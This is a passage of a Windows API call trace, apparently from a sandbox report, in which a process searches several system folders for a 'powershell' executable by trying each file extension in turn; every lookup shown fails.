	[0626.551] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0626.551] SetErrorMode (uMode=0x1) returned 0x1
	[0626.551] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0626.551] SetErrorMode (uMode=0x1) returned 0x1
	[0626.551] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0626.551] SetErrorMode (uMode=0x1) returned 0x1
	[0626.552] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0626.552] SetErrorMode (uMode=0x1) returned 0x1
	[0626.552] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0626.552] SetErrorMode (uMode=0x1) returned 0x1
	[0626.552] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0626.552] SetErrorMode (uMode=0x1) returned 0x1
	[0626.552] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0626.553] SetErrorMode (uMode=0x1) returned 0x1
	[0626.553] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0626.553] SetErrorMode (uMode=0x1) returned 0x1
	[0626.553] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0626.553] SetErrorMode (uMode=0x1) returned 0x1
	[0626.553] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0626.554] SetErrorMode (uMode=0x1) returned 0x1
	[0626.554] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0626.554] SetErrorMode (uMode=0x1) returned 0x1
	[0626.554] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0626.554] SetErrorMode (uMode=0x1) returned 0x1
	[0626.554] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0626.555] SetErrorMode (uMode=0x1) returned 0x1
	[0626.555] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0626.555] SetErrorMode (uMode=0x1) returned 0x1
	[0626.555] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0626.555] SetErrorMode (uMode=0x1) returned 0x1
	[0626.555] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0626.556] SetErrorMode (uMode=0x1) returned 0x1
	[0626.556] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0626.556] SetErrorMode (uMode=0x1) returned 0x1
	[0626.556] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0626.556] SetErrorMode (uMode=0x1) returned 0x1
	[0626.556] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0626.556] SetErrorMode (uMode=0x1) returned 0x1
	[0626.557] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0626.557] SetErrorMode (uMode=0x1) returned 0x1
	[0626.557] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0626.557] SetErrorMode (uMode=0x1) returned 0x1
	[0626.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0626.557] SetErrorMode (uMode=0x1) returned 0x1
	[0626.558] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0626.558] SetErrorMode (uMode=0x1) returned 0x1
	[0626.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0626.558] SetErrorMode (uMode=0x1) returned 0x1
	[0626.558] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0626.558] SetErrorMode (uMode=0x1) returned 0x1
	[0626.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0626.559] SetErrorMode (uMode=0x1) returned 0x1
	[0626.559] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0626.559] SetErrorMode (uMode=0x1) returned 0x1
	[0626.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0626.559] SetErrorMode (uMode=0x1) returned 0x1
	[0626.559] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0626.560] SetErrorMode (uMode=0x1) returned 0x1
	[0626.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0626.560] SetErrorMode (uMode=0x1) returned 0x1
	[0626.560] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0626.560] SetErrorMode (uMode=0x1) returned 0x1
	[0626.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0626.561] SetErrorMode (uMode=0x1) returned 0x1
	[0626.561] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0626.561] SetErrorMode (uMode=0x1) returned 0x1
	[0626.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0626.561] SetErrorMode (uMode=0x1) returned 0x1
	[0626.561] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0626.562] SetErrorMode (uMode=0x1) returned 0x1
	[0626.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0626.562] SetErrorMode (uMode=0x1) returned 0x1
	[0626.562] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0626.562] SetErrorMode (uMode=0x1) returned 0x1
	[0626.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0626.562] SetErrorMode (uMode=0x1) returned 0x1
	[0626.563] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0626.563] SetErrorMode (uMode=0x1) returned 0x1
	[0626.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0626.563] SetErrorMode (uMode=0x1) returned 0x1
	[0626.563] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0626.563] SetErrorMode (uMode=0x1) returned 0x1
	[0626.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0626.564] SetErrorMode (uMode=0x1) returned 0x1
	[0626.564] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0626.564] SetErrorMode (uMode=0x1) returned 0x1
	[0626.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0626.565] SetErrorMode (uMode=0x1) returned 0x1
	[0626.565] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0626.565] SetErrorMode (uMode=0x1) returned 0x1
	[0626.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0626.565] SetErrorMode (uMode=0x1) returned 0x1
	[0626.565] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0626.566] SetErrorMode (uMode=0x1) returned 0x1
	[0626.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0626.566] SetErrorMode (uMode=0x1) returned 0x1
	[0626.566] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0626.566] SetErrorMode (uMode=0x1) returned 0x1
	[0626.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0626.567] SetErrorMode (uMode=0x1) returned 0x1
	[0626.567] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0626.567] SetErrorMode (uMode=0x1) returned 0x1
	[0626.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0626.567] SetErrorMode (uMode=0x1) returned 0x1
	[0626.567] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0626.568] SetErrorMode (uMode=0x1) returned 0x1
	[0626.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0626.568] SetErrorMode (uMode=0x1) returned 0x1
	[0626.568] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0626.568] SetErrorMode (uMode=0x1) returned 0x1
	[0626.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0626.568] SetErrorMode (uMode=0x1) returned 0x1
	[0626.569] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0626.569] SetErrorMode (uMode=0x1) returned 0x1
	[0626.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0626.569] SetErrorMode (uMode=0x1) returned 0x1
	[0626.569] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0626.569] SetErrorMode (uMode=0x1) returned 0x1
	[0626.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0626.570] SetErrorMode (uMode=0x1) returned 0x1
